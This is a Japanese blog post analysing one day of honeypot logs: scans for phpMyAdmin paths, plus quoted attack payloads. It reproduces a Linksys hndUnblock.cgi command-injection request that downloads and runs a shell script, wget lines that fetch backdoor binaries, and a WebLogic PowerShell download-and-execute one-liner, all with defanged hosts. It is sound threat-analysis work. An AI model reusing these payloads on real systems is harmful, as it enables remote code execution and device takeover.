S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(2日目)

モチベのあるうちに少しでもいいから書いていこうと思います。

 

6/5分のアクセスは計142アクセスでした。以下、パス別集計です。

47 [2018-06-05 /
2 [2018-06-05 /xampp/phpmyadmin/index.php
2 [2018-06-05 /www/phpMyAdmin/index.php
2 [2018-06-05 /web/phpMyAdmin/index.php
2 [2018-06-05 /typo3/phpmyadmin/index.php
2 [2018-06-05 /tools/phpMyAdmin/index.php
2 [2018-06-05 /pmd/index.php
2 [2018-06-05 /pma-old/index.php
2 [2018-06-05 /pmamy/index.php
2 [2018-06-05 /pmamy2/index.php
2 [2018-06-05 /pma/index.php
2 [2018-06-05 /PMA2/index.php
2 [2018-06-05 /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-05 /phpmyadmin/phpmyadmin/index.php
2 [2018-06-05 /phpMyAdminold/index.php
2 [2018-06-05 /phpMyAdmin.old/index.php
2 [2018-06-05 /phpmyadmin-old/index.php
2 [2018-06-05 /phpMyAdmin/index.php
2 [2018-06-05 /phpmyadmin/index.php
2 [2018-06-05 /phpMyadmin_bak/index.php
2 [2018-06-05 /phpmyadmin2/index.php
2 [2018-06-05 /phpmyadmin1/index.php
2 [2018-06-05 /phpmyadmin0/index.php
2 [2018-06-05 /phpma/index.php
2 [2018-06-05 /phpadmin/index.php
2 [2018-06-05 /mysql/index.php
2 [2018-06-05 /mysqladmin/index.php
2 [2018-06-05 /mysql-admin/index.php
2 [2018-06-05 /myadmin/index.php
2 [2018-06-05 /myadmin2/index.php
2 [2018-06-05 /index.php
2 [2018-06-05 /hndUnblock.cgi
2 [2018-06-05 /HNAP1/
2 [2018-06-05 /getcfg.php
2 [2018-06-05 /db/index.php
2 [2018-06-05 /dbadmin/index.php
2 [2018-06-05 /claroline/phpMyAdmin/index.php
2 [2018-06-05 /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-05 /admin/PMA/index.php
2 [2018-06-05 /admin/pma/index.php
2 [2018-06-05 /admin/phpMyAdmin/index.php
2 [2018-06-05 /admin/phpmyadmin/index.php
2 [2018-06-05 /admin/phpmyadmin2/index.php
2 [2018-06-05 /admin/mysql/index.php
2 [2018-06-05 /admin/mysql2/index.php
2 [2018-06-05 /admin/index.php
1 [2018-06-05 /xxbb
1 [2018-06-05 /wls-wsat/CoordinatorPortType
1 [2018-06-05 /webfig/roteros.info
1 [2018-06-05 /moo
1 [2018-06-05 /ccvv

内容的には、PhpMyAdminを狙ったものが多いです。よくある感じです。

 

また、デフォルトの設定のままハンティングだけを有効にしておいたところ、早速、1件ありました。

186.205.92[.]89 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh 

この内容が含まれるアクセスには以下が含まれていました。

POST /hndUnblock.cgi HTTP/1.1
User-Agent: Wget(linux)
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh`&StartEPI=1

 このパスはCisco Linksysというワイヤレスルータを狙ったもののようです。

取得されるものは以下です。

https://www.hybrid-analysis.com/sample/82adfbffe47a48f1f14f9460759d22c0ce381bba8029635b3297544b1ef04e12/5a8b3cf27ca3e177502a1ad3

このシェルスクリプト内で更に別のファイル3つを同じドメインから取得するようです。

wget -O .nttpd hxxp://domstates[.]su/.nttpd,21-mips-le-t1
wget -O .nttpd-z hxxp://domstates[.]su/.nttpd,21-arm-le-t1-z
wget -O .nttpd-z hxxp://domstates[.]su/.nttpd,21-mips-be-t2-z 

 これらはバックドアダウンローダのようでした。

 

なお、今回の解析にあたっては以下のサイトを参考にさせていただきました。

www.morihi-soc.net

fatsheep.hateblo.jp

 

saito.hatenadiary.com

exchange.xforce.ibmcloud.com

 

また、よくログを見てみたら、weblogic脆弱性を狙ったものも1つ混ざっています。

1 [2018-06-05 /wls-wsat/CoordinatorPortType

内容を確認すると、webshellの埋め込みと思われるものです。よく見ます。

Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E $OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://120.25.148[.]202/images/test/DL.php');